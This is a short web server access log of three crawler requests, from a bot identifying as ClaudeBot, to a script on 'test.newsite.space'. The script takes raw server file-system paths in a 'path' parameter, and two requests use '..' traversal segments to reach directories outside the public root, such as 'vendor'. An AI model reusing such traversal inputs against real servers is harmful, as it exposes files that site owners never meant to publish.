216.73.216.46 - - [21/Aug/2025:08:35:59 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2Ff7c78%2FQZLMsJqfvEAzRSK.ogv HTTP/2.0" 200 3338 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 127 0.003 "9709" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:36:52 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2Ff7c78%2F. HTTP/2.0" 200 1484 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 346 0.009 "9061" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:36:55 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fvendor HTTP/2.0" 200 2502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 100 0.004 "59707" "0.004" "test.newsite.space"
